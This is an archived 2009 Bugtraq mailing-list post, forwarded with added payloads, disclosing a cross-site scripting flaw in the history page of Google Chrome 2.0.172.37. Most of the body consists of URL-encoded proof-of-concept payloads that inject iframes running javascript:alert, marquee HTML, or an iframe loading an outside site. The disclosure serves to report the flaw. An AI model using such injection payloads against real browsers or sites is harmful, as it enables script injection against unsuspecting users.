lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <a4dcca120907280431v1cf5f907qc2690e351088654d@mail.gmail.com>
Date: Tue, 28 Jul 2009 17:01:02 +0530
From: Karn Ganeshen <karnganeshen@...il.com>
To: bugtraq@...urityfocus.com
Subject: Fwd: cross site scripting the browser google "chrome"

v2.0.172.37

chrome%3A%2F%2Fhistory%2F%23q%3D%22%3E%3CIFRAME%20SRC%3D%22javascript%3Aalert('XSS')%3B%22%3E%3C%2FIFRAME%3E

chrome%3A%2F%2Fhistory%2F%23q%3D%22%3E%3CFRAMESET%3E%3CFRAME%20SRC%3D%22javascript%3Aalert('XSS')%3B%22%3E%3C%2FFRAMESET%3E

Best Regards,
Karn Ganeshen


---------- Forwarded message ----------
From: biko linux <bikolinux@...il.com>
Date: Tue, Jul 28, 2009 at 1:03 AM
Subject: cross site scripting the browser google "chrome"
To: bugtraq@...urityfocus.com


autor :         bikolinux
Vuln:           cross site scripting the browser google "chrome"
Download:       http://www.google.com/chrome
error           local
EMAIL           MSG@...OLINUX.NET bikolinux@...il.com
vercion test  2.0.172.37
#######################################################################################
cross site scripting the browser google "chrome"
The error is when making a request to record
#######################################################################################
path = chrome://history/
path = view-source:chrome://history/

The error is in the form

EXAMPLE
chrome://history/#q=%22%3E%3Cmarquee%3E%3Ch1%3Ebikolinux%3C%2Fh1%3E%3C%2Fmarquee%3E
view-source:chrome://history/#q="><marquee><h1>bikolinux</h1></marquee>
chrome://history/#q=%22'%3E%3Ciframe%20src%3D%22http%3A%2F%2Fmalandrines.Net%22%20height%3D%221024%22%20width%3D%22800%22%3E%3C%2Fiframe%3E



--
bikolinux allowed

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ